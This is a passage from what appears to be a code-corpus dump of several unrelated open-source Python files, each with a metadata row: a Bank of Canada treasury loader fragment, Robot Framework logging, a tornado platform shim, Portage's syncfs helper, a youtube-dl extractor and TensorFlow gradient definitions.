bond_end_date = datetime.datetime.strptime(
bond_row.split(' - ')[1].strip(),
"%Y-%m-%d").date()
bond_header = bond_row.split(",")
# Line up the two dates
if bill_end_date > bond_end_date:
bill_iter.next()
elif bond_end_date > bill_end_date:
bond_iter.next()
for bill_row in bill_iter:
bond_row = bond_iter.next()
bill_dict = dict(zip(bill_header, bill_row.split(",")))
bond_dict = dict(zip(bond_header, bond_row.split(",")))
if ' Bank holiday' in bond_row.split(",") + bill_row.split(","):
continue
if ' Not available' in bond_row.split(",") + bill_row.split(","):
continue
bill_dict.update(bond_dict)
yield bill_dict
def get_treasury_data():
mappings = treasury_mappings(_CURVE_MAPPINGS)
source = get_treasury_source()
return source_to_records(mappings, source)
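# Illustrative use (requires network access to bankofcanada.ca; the record
# layout is whatever loader_utils.source_to_records produces for the field
# names in _CURVE_MAPPINGS -- a sketch, not a tested example):
#
#   records = get_treasury_data()
#   for record in records:
#       print record['date'], record['1month'], record['30year']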
| apache-2.0 | 3,969,860,073,118,303,700 | 32.504 | 75 | 0.602197 | false |
snyderr/robotframework | src/robot/output/librarylogger.py | 3 | 2191 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the public test library logging API.
This is exposed via :py:mod:`robot.api.logger`. Implementation must reside
here to avoid cyclic imports.
"""
import sys
import threading
from robot.errors import DataError
from robot.utils import unic, console_encode
from .logger import LOGGER
from .loggerhelper import Message
LOGGING_THREADS = ('MainThread', 'RobotFrameworkTimeoutThread')
def write(msg, level, html=False):
# Callable messages allow lazy logging internally, but we don't want to
# expose this functionality publicly. See the following issue for details:
# https://github.com/robotframework/robotframework/issues/1505
if callable(msg):
msg = unic(msg)
if level.upper() not in ('TRACE', 'DEBUG', 'INFO', 'HTML', 'WARN', 'ERROR'):
raise DataError("Invalid log level '%s'." % level)
if threading.currentThread().getName() in LOGGING_THREADS:
LOGGER.log_message(Message(msg, level, html))
def trace(msg, html=False):
write(msg, 'TRACE', html)
def debug(msg, html=False):
write(msg, 'DEBUG', html)
def info(msg, html=False, also_console=False):
write(msg, 'INFO', html)
if also_console:
console(msg)
def warn(msg, html=False):
write(msg, 'WARN', html)
def error(msg, html=False):
write(msg, 'ERROR', html)
def console(msg, newline=True, stream='stdout'):
msg = unic(msg)
if newline:
msg += '\n'
stream = sys.__stdout__ if stream.lower() != 'stderr' else sys.__stderr__
stream.write(console_encode(msg, stream=stream))
stream.flush()
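# Usage sketch: test libraries normally reach these functions through the
# public `robot.api.logger` facade mentioned in the module docstring, e.g.
#
#   from robot.api import logger
#   logger.info('Connecting to server', also_console=True)
#   logger.warn('<b>Slow response</b>', html=True)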
| apache-2.0 | 3,880,569,546,245,713,000 | 28.608108 | 80 | 0.700593 | false |
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/zmq/eventloop/minitornado/platform/auto.py | 50 | 1424 | #!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of platform-specific functionality.
For each function or class described in `tornado.platform.interface`,
the appropriate platform-specific implementation exists in this module.
Most code that needs access to this functionality should do e.g.::
from tornado.platform.auto import set_close_exec
"""
from __future__ import absolute_import, division, print_function, with_statement
import os
if os.name == 'nt':
from .common import Waker
from .windows import set_close_exec
else:
from .posix import set_close_exec, Waker
try:
# monotime monkey-patches the time module to have a monotonic function
# in versions of python before 3.3.
import monotime
except ImportError:
pass
try:
from time import monotonic as monotonic_time
except ImportError:
monotonic_time = None
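# Callers can then fall back gracefully, illustratively:
#
#   import time
#   now = monotonic_time() if monotonic_time is not None else time.time()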
| apache-2.0 | -4,155,557,865,301,299,000 | 30.644444 | 80 | 0.754213 | false |
candrews/portage | pym/portage/dbapi/_SyncfsProcess.py | 8 | 1169 | # Copyright 2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from portage import os
from portage.util._ctypes import find_library, LoadLibrary
from portage.util._async.ForkProcess import ForkProcess
class SyncfsProcess(ForkProcess):
"""
Isolate ctypes usage in a subprocess, in order to avoid
potential problems with stale cached libraries as
described in bug #448858, comment #14 (also see
http://bugs.python.org/issue14597).
"""
__slots__ = ('paths',)
@staticmethod
def _get_syncfs():
filename = find_library("c")
if filename is not None:
library = LoadLibrary(filename)
if library is not None:
try:
return library.syncfs
except AttributeError:
pass
return None
def _run(self):
syncfs_failed = False
syncfs = self._get_syncfs()
if syncfs is not None:
for path in self.paths:
try:
fd = os.open(path, os.O_RDONLY)
except OSError:
pass
else:
try:
if syncfs(fd) != 0:
# Happens with PyPy (bug #446610)
syncfs_failed = True
finally:
os.close(fd)
if syncfs is None or syncfs_failed:
return 1
return os.EX_OK
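# Illustrative call site (a sketch; `global_event_loop` is assumed to come
# from portage.util._eventloop.global_event_loop, and real callers live
# elsewhere in portage):
#
#   proc = SyncfsProcess(paths=["/usr/portage"],
#                        scheduler=global_event_loop())
#   proc.start()
#   returncode = proc.wait()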
| gpl-2.0 | -2,537,455,299,542,058,000 | 21.056604 | 66 | 0.680068 | false |
MiLk/youtube-dl | youtube_dl/extractor/wimp.py | 13 | 1787 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .youtube import YoutubeIE
class WimpIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?wimp\.com/([^/]+)/'
_TESTS = [{
'url': 'http://www.wimp.com/maruexhausted/',
'md5': 'f1acced123ecb28d9bb79f2479f2b6a1',
'info_dict': {
'id': 'maruexhausted',
'ext': 'flv',
'title': 'Maru is exhausted.',
'description': 'md5:57e099e857c0a4ea312542b684a869b8',
}
}, {
# youtube video
'url': 'http://www.wimp.com/clowncar/',
'info_dict': {
'id': 'cG4CEr2aiSg',
'ext': 'mp4',
'title': 'Basset hound clown car...incredible!',
'description': 'md5:8d228485e0719898c017203f900b3a35',
'uploader': 'Gretchen Hoey',
'uploader_id': 'gretchenandjeff1',
'upload_date': '20140303',
},
'add_ie': ['Youtube'],
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group(1)
webpage = self._download_webpage(url, video_id)
video_url = self._search_regex(
r's1\.addVariable\("file",\s*"([^"]+)"\);', webpage, 'video URL')
if YoutubeIE.suitable(video_url):
self.to_screen('Found YouTube video')
return {
'_type': 'url',
'url': video_url,
'ie_key': YoutubeIE.ie_key(),
}
return {
'id': video_id,
'url': video_url,
'title': self._og_search_title(webpage),
'thumbnail': self._og_search_thumbnail(webpage),
'description': self._og_search_description(webpage),
}
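# Usage sketch: the extractor is selected automatically from _VALID_URL, e.g.
#
#   youtube-dl http://www.wimp.com/maruexhausted/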
| unlicense | -3,861,804,675,147,954,700 | 31.490909 | 77 | 0.512031 | false |
benoitsteiner/tensorflow | tensorflow/python/ops/math_grad.py | 5 | 33823 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in math_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
def _safe_shape_div(x, y):
"""Divides `x / y` assuming `x, y >= 0`, treating `0 / 0 = 0`."""
return x // math_ops.maximum(y, 1)
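# For example, _safe_shape_div(0, 0) == 0 instead of raising, which matters
# when an input dimension (and therefore a kept-dims output dimension) is 0.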
@ops.RegisterGradient("Sum")
def _SumGrad(op, grad):
"""Gradient for Sum."""
# Fast path for when reducing to a scalar and ndims is known: adds only
# Reshape and Tile ops (and possibly a Shape).
if (op.inputs[0].get_shape().ndims is not None and
op.inputs[1].op.type == "Const"):
rank = op.inputs[0].get_shape().ndims
axes = tensor_util.MakeNdarray(op.inputs[1].op.get_attr("value"))
if np.array_equal(axes, np.arange(rank)): # Reduce all dims.
grad = array_ops.reshape(grad, [1] * rank)
# If shape is not fully defined (but rank is), we use Shape.
if op.inputs[0].get_shape().is_fully_defined():
input_shape = op.inputs[0].get_shape().as_list()
else:
input_shape = array_ops.shape(op.inputs[0])
return [array_ops.tile(grad, input_shape), None]
input_shape = array_ops.shape(op.inputs[0])
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
tile_scaling = _safe_shape_div(input_shape, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
return [array_ops.tile(grad, tile_scaling), None]
def _MinOrMaxGrad(op, grad):
"""Gradient for Min or Max. Amazingly it's precisely the same code."""
input_shape = array_ops.shape(op.inputs[0])
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
y = op.outputs[0]
y = array_ops.reshape(y, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
# Compute the number of selected (maximum or minimum) elements in each
# reduction dimension. If there are multiple minimum or maximum elements
# then the gradient will be divided between them.
indicators = math_ops.cast(math_ops.equal(y, op.inputs[0]), grad.dtype)
num_selected = array_ops.reshape(
math_ops.reduce_sum(indicators, op.inputs[1]), output_shape_kept_dims)
return [math_ops.div(indicators, num_selected) * grad, None]
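# Worked example (illustrative): for x = [1., 3., 3.] reduced with Max to
# y = 3., `indicators` is [0., 1., 1.], `num_selected` is 2., and an incoming
# grad of 1. is split evenly as [0., 0.5, 0.5].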
@ops.RegisterGradient("Max")
def _MaxGrad(op, grad):
"""Gradient for Max."""
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Min")
def _MinGrad(op, grad):
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Mean")
def _MeanGrad(op, grad):
"""Gradient for Mean."""
sum_grad = _SumGrad(op, grad)[0]
input_shape = array_ops.shape(op.inputs[0])
output_shape = array_ops.shape(op.outputs[0])
factor = _safe_shape_div(
math_ops.reduce_prod(input_shape), math_ops.reduce_prod(output_shape))
return sum_grad / math_ops.cast(factor, sum_grad.dtype), None
@ops.RegisterGradient("Prod")
def _ProdGrad(op, grad):
"""Gradient for Prod."""
# The gradient can be expressed by dividing the product by each entry of the
# input tensor, but this approach can't deal with zeros in the input.
# Here, we avoid this problem by composing the output as a product of two
# cumprod operations.
input_shape = array_ops.shape(op.inputs[0])
# Reshape reduction indices for the case where the parameter is a scalar
reduction_indices = array_ops.reshape(op.inputs[1], [-1])
# Expand grad to full input shape
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
tile_scaling = _safe_shape_div(input_shape, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
grad = array_ops.tile(grad, tile_scaling)
# Pack all reduced dimensions into a single one, so we can perform the
# cumprod ops. If the reduction dims list is empty, it defaults to float32,
# so we need to cast here. We put all the shape-related ops on CPU to avoid
# copying back and forth, and since listdiff is CPU only.
with ops.device("/cpu:0"):
reduced = math_ops.cast(reduction_indices, dtypes.int32)
idx = math_ops.range(0, array_ops.rank(op.inputs[0]))
other, _ = array_ops.setdiff1d(idx, reduced)
perm = array_ops.concat([reduced, other], 0)
reduced_num = math_ops.reduce_prod(array_ops.gather(input_shape, reduced))
other_num = math_ops.reduce_prod(array_ops.gather(input_shape, other))
permuted = array_ops.transpose(op.inputs[0], perm)
permuted_shape = array_ops.shape(permuted)
reshaped = array_ops.reshape(permuted, (reduced_num, other_num))
# Calculate product, leaving out the current entry
left = math_ops.cumprod(reshaped, axis=0, exclusive=True)
right = math_ops.cumprod(reshaped, axis=0, exclusive=True, reverse=True)
y = array_ops.reshape(left * right, permuted_shape)
# Invert the transpose and reshape operations.
# Make sure to set the statically known shape information through a reshape.
out = grad * array_ops.transpose(y, array_ops.invert_permutation(perm))
return array_ops.reshape(out, input_shape), None
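# Identity used above (sketch): with left_i = prod_{j<i} x_j and
# right_i = prod_{j>i} x_j, d(prod_j x_j)/dx_i = left_i * right_i, so no x_i
# appears in a denominator and zeros in the input are handled exactly.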
@ops.RegisterGradient("SegmentSum")
def _SegmentSumGrad(op, grad):
"""Gradient for SegmentSum."""
return array_ops.gather(grad, op.inputs[1]), None
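# Illustrative: for data [a, b, c] with segment_ids [0, 0, 1] the forward op
# returns [a + b, c]; gather(grad, segment_ids) routes grad[0] back to both a
# and b, and grad[1] to c.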
@ops.RegisterGradient("SegmentMean")
def _SegmentMeanGrad(op, grad):
"""Gradient for SegmentMean."""
input_rank = array_ops.rank(op.inputs[0])
ones_shape = array_ops.concat([
array_ops.shape(op.inputs[1]),
array_ops.fill(array_ops.expand_dims(input_rank - 1, 0), 1)
], 0)
ones = array_ops.fill(ones_shape,
constant_op.constant(1, dtype=grad.dtype))
scaled_grad = math_ops.div(grad, math_ops.segment_sum(ones, op.inputs[1]))
return array_ops.gather(scaled_grad, op.inputs[1]), None
@ops.RegisterGradient("SparseSegmentSum")
def _SparseSegmentSumGrad(op, grad):
"""Gradient for SparseSegmentSum."""
input_rows = array_ops.shape(op.inputs[0])[0]
return (math_ops.unsorted_segment_sum(
array_ops.gather(grad, op.inputs[2]), op.inputs[1], input_rows), None,
None)
@ops.RegisterGradient("SparseSegmentMean")
def _SparseSegmentMeanGrad(op, grad):
"""Gradient for SparseSegmentMean."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_mean_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
@ops.RegisterGradient("SparseSegmentSqrtN")
def _SparseSegmentSqrtNGrad(op, grad):
"""Gradient for SparseSegmentSqrtN."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_sqrt_n_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
def _SegmentMinOrMaxGrad(op, grad, is_sorted):
"""Gradient for SegmentMin and (unsorted) SegmentMax. They share similar code."""
zeros = array_ops.zeros(array_ops.shape(op.inputs[0]),
dtype=op.inputs[0].dtype)
# Get the number of selected (minimum or maximum) elements in each segment.
gathered_outputs = array_ops.gather(op.outputs[0], op.inputs[1])
is_selected = math_ops.equal(op.inputs[0], gathered_outputs)
if is_sorted:
num_selected = math_ops.segment_sum(math_ops.cast(is_selected, grad.dtype),
op.inputs[1])
else:
num_selected = math_ops.unsorted_segment_sum(math_ops.cast(is_selected, grad.dtype),
op.inputs[1], op.inputs[2])
# Compute the gradient for each segment. The gradient for the ith segment is
# divided evenly among the selected elements in that segment.
weighted_grads = math_ops.div(grad, num_selected)
gathered_grads = array_ops.gather(weighted_grads, op.inputs[1])
if is_sorted:
return array_ops.where(is_selected, gathered_grads, zeros), None
else:
return array_ops.where(is_selected, gathered_grads, zeros), None, None
@ops.RegisterGradient("SegmentMin")
def _SegmentMinGrad(op, grad):
"""Gradient for SegmentMin."""
return _SegmentMinOrMaxGrad(op, grad, True)
@ops.RegisterGradient("SegmentMax")
def _SegmentMaxGrad(op, grad):
"""Gradient for SegmentMax."""
return _SegmentMinOrMaxGrad(op, grad, True)
@ops.RegisterGradient("UnsortedSegmentSum")
def _UnsortedSegmentSumGrad(op, grad):
"""Gradient for SegmentSum."""
return array_ops.gather(grad, op.inputs[1]), None, None
@ops.RegisterGradient("UnsortedSegmentMax")
def _UnsortedSegmentMaxGrad(op, grad):
return _SegmentMinOrMaxGrad(op, grad, False)
@ops.RegisterGradient("Abs")
def _AbsGrad(op, grad):
x = op.inputs[0]
return grad * math_ops.sign(x)
@ops.RegisterGradient("Neg")
def _NegGrad(_, grad):
"""Returns -grad."""
return -grad
@ops.RegisterGradient("Inv")
def _InvGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
# pylint: disable=protected-access
return gen_math_ops._reciprocal_grad(y, grad)
@ops.RegisterGradient("Reciprocal")
def _ReciprocalGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
# pylint: disable=protected-access
return gen_math_ops._reciprocal_grad(y, grad)
@ops.RegisterGradient("InvGrad")
def _InvGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
# pylint: disable=protected-access
return cg * -2.0 * b * ca, gen_math_ops._reciprocal_grad(ca, grad)
@ops.RegisterGradient("ReciprocalGrad")
def _ReciprocalGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
# pylint: disable=protected-access
return cg * -2.0 * b * ca, gen_math_ops._reciprocal_grad(ca, grad)
@ops.RegisterGradient("Square")
def _SquareGrad(op, grad):
x = op.inputs[0]
# Added control dependencies to prevent 2*x from being computed too early.
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * (2.0 * x)
@ops.RegisterGradient("Sqrt")
def _SqrtGrad(op, grad):
y = op.outputs[0] # y = x^(1/2)
return gen_math_ops._sqrt_grad(y, grad)
@ops.RegisterGradient("SqrtGrad")
def _SqrtGradGrad(op, grad):
a = op.inputs[0]
y = op.outputs[0] # y = 0.5 * b / conj(a)
with ops.control_dependencies([grad.op]):
ga = grad / a
return -math_ops.conj(ga) * y, 0.5 * ga
@ops.RegisterGradient("Rsqrt")
def _RsqrtGrad(op, grad):
"""Returns -0.5 * grad * conj(y)^3."""
y = op.outputs[0] # y = x^(-1/2)
return gen_math_ops._rsqrt_grad(y, grad)
@ops.RegisterGradient("RsqrtGrad")
def _RsqrtGradGrad(op, grad):
"""Returns backprop gradient for f(a,b) = -0.5 * b * conj(a)^3."""
a = op.inputs[0] # a = x^{-1/2}
b = op.inputs[1] # backprop gradient for a
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(a)
cg = math_ops.conj(grad)
grad_a = -1.5 * cg * b * math_ops.square(ca)
# pylint: disable=protected-access
grad_b = gen_math_ops._rsqrt_grad(ca, grad)
return grad_a, grad_b
@ops.RegisterGradient("Exp")
def _ExpGrad(op, grad):
"""Returns grad * exp(x)."""
y = op.outputs[0] # y = e^x
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
return grad * y
@ops.RegisterGradient("Expm1")
def _Expm1Grad(op, grad):
"""Returns grad * exp(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
y = math_ops.exp(x)
return grad * y
@ops.RegisterGradient("Log")
def _LogGrad(op, grad):
"""Returns grad * (1/x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(x)
@ops.RegisterGradient("Log1p")
def _Log1pGrad(op, grad):
"""Returns grad * (1/(1 + x))."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(1 + x)
@ops.RegisterGradient("Sinh")
def _SinhGrad(op, grad):
"""Returns grad * cosh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.cosh(x)
@ops.RegisterGradient("Cosh")
def _CoshGrad(op, grad):
"""Returns grad * sinh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.sinh(x)
@ops.RegisterGradient("Tanh")
def _TanhGrad(op, grad):
"""Returns grad * (1 - tanh(x) * tanh(x))."""
y = op.outputs[0] # y = tanh(x)
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
# pylint: disable=protected-access
return gen_math_ops._tanh_grad(y, grad)
@ops.RegisterGradient("TanhGrad")
def _TanhGradGrad(op, grad):
with ops.control_dependencies([grad.op]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
# pylint: disable=protected-access
return grad * -2.0 * b * a, gen_math_ops._tanh_grad(a, grad)
@ops.RegisterGradient("Erf")
def _ErfGrad(op, grad):
"""Returns grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
two_over_root_pi = constant_op.constant(2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Erfc")
def _ErfcGrad(op, grad):
"""Returns -grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
minus_two_over_root_pi = constant_op.constant(
-2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * minus_two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Lgamma")
def _LgammaGrad(op, grad):
"""Returns grad * digamma(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.digamma(x)
@ops.RegisterGradient("Digamma")
def _DigammaGrad(op, grad):
"""Compute gradient of the digamma function with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.polygamma(array_ops.constant(1, dtype=x.dtype), x)
@ops.RegisterGradient("Igamma")
def _IgammaGrad(op, grad):
"""Returns gradient of igamma(a, x) with respect to x."""
# TODO(ebrevdo): Perhaps add the derivative w.r.t. a
a = op.inputs[0]
x = op.inputs[1]
sa = array_ops.shape(a)
sx = array_ops.shape(x)
unused_ra, rx = gen_array_ops._broadcast_gradient_args(sa, sx)
# Perform operations in log space before summing, because Gamma(a)
# and Gamma'(a) can grow large.
partial_x = math_ops.exp(-x + (a - 1) * math_ops.log(x) - math_ops.lgamma(a))
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Igammac")
def _IgammacGrad(op, grad):
"""Returns gradient of igammac(a, x) = 1 - igamma(a, x) w.r.t. x."""
_, igamma_grad_x = _IgammaGrad(op, grad)
return None, -igamma_grad_x
@ops.RegisterGradient("Betainc")
def _BetaincGrad(op, grad):
"""Returns gradient of betainc(a, b, x) with respect to x."""
# TODO(ebrevdo): Perhaps add the derivative w.r.t. a, b
a, b, x = op.inputs
# two cases: x is a scalar and a/b are same-shaped tensors, or vice
# versa; so its sufficient to check against shape(a).
sa = array_ops.shape(a)
sx = array_ops.shape(x)
# pylint: disable=protected-access
_, rx = gen_array_ops._broadcast_gradient_args(sa, sx)
# pylint: enable=protected-access
# Perform operations in log space before summing, because terms
# can grow large.
log_beta = (gen_math_ops.lgamma(a) + gen_math_ops.lgamma(b)
- gen_math_ops.lgamma(a + b))
partial_x = math_ops.exp(
(b - 1) * math_ops.log(1 - x) + (a - 1) * math_ops.log(x) - log_beta)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None, # da
None, # db
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Zeta")
def _ZetaGrad(op, grad):
"""Returns gradient of zeta(x, q) with respect to x and q."""
# TODO(tillahoffmann): Add derivative with respect to x
x = op.inputs[0]
q = op.inputs[1]
# Broadcast gradients
sx = array_ops.shape(x)
sq = array_ops.shape(q)
unused_rx, rq = gen_array_ops._broadcast_gradient_args(sx, sq)
# Evaluate gradient
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
q = math_ops.conj(q)
partial_q = -x * math_ops.zeta(x + 1, q)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_q * grad, rq), sq))
@ops.RegisterGradient("Polygamma")
def _PolygammaGrad(op, grad):
"""Returns gradient of psi(n, x) with respect to n and x."""
# TODO(tillahoffmann): Add derivative with respect to n
n = op.inputs[0]
x = op.inputs[1]
# Broadcast gradients
sn = array_ops.shape(n)
sx = array_ops.shape(x)
unused_rn, rx = gen_array_ops._broadcast_gradient_args(sn, sx)
# Evaluate gradient
with ops.control_dependencies([grad.op]):
n = math_ops.conj(n)
x = math_ops.conj(x)
partial_x = math_ops.polygamma(n + 1, x)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Sigmoid")
def _SigmoidGrad(op, grad):
"""Returns grad * sigmoid(x) * (1 - sigmoid(x))."""
y = op.outputs[0] # y = sigmoid(x)
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
# pylint: disable=protected-access
return gen_math_ops._sigmoid_grad(y, grad)
@ops.RegisterGradient("SigmoidGrad")
def _SigmoidGradGrad(op, grad):
with ops.control_dependencies([grad.op]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
gb = grad * b
# pylint: disable=protected-access
return gb - 2.0 * gb * a, gen_math_ops._sigmoid_grad(a, grad)
@ops.RegisterGradient("Sign")
def _SignGrad(op, _):
"""Returns 0."""
x = op.inputs[0]
return array_ops.zeros(array_ops.shape(x), dtype=x.dtype)
@ops.RegisterGradient("Sin")
def _SinGrad(op, grad):
"""Returns grad * cos(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.cos(x)
@ops.RegisterGradient("Cos")
def _CosGrad(op, grad):
"""Returns grad * -sin(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return -grad * math_ops.sin(x)
@ops.RegisterGradient("Tan")
def _TanGrad(op, grad):
"""Returns grad * 1/sec^2(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
secx = math_ops.reciprocal(math_ops.cos(x))
secx2 = math_ops.square(secx)
return grad * secx2
@ops.RegisterGradient("Asin")
def _AsinGrad(op, grad):
"""Returns grad * 1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return grad * inv
@ops.RegisterGradient("Acos")
def _AcosGrad(op, grad):
"""Returns grad * -1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return -grad * inv
@ops.RegisterGradient("Atan")
def _AtanGrad(op, grad):
"""Returns grad * 1/ (1 + x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
inv = math_ops.reciprocal(math_ops.add(one, x2))
return grad * inv
@ops.RegisterGradient("Atan2")
def _Atan2Grad(op, grad):
"""Returns grad * x / (x^2 + y^2), grad * -y / (x^2 + y^2)."""
y = op.inputs[0]
x = op.inputs[1]
with ops.control_dependencies([grad.op]):
grad_inv = grad / (math_ops.square(x) + math_ops.square(y))
return x * grad_inv, -y * grad_inv
@ops.RegisterGradient("AddN")
def _AddNGrad(op, grad):
"""Copies the gradient to all inputs."""
# Not broadcasting.
return [grad] * len(op.inputs)
@ops.RegisterGradient("Add")
def _AddGrad(op, grad):
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(grad, rx), sx),
array_ops.reshape(math_ops.reduce_sum(grad, ry), sy))
@ops.RegisterGradient("Sub")
def _SubGrad(op, grad):
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(grad, rx), sx),
array_ops.reshape(-math_ops.reduce_sum(grad, ry), sy))
@ops.RegisterGradient("Mul")
def _MulGrad(op, grad):
"""The gradient of scalar multiplication."""
x = op.inputs[0]
y = op.inputs[1]
assert x.dtype.base_dtype == y.dtype.base_dtype, (x.dtype, " vs. ", y.dtype)
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(math_ops.reduce_sum(grad * y, rx), sx),
array_ops.reshape(math_ops.reduce_sum(x * grad, ry), sy))
@ops.RegisterGradient("Div")
def _DivGrad(op, grad):
"""The gradient for the Div operator."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
x = math_ops.conj(x)
y = math_ops.conj(y)
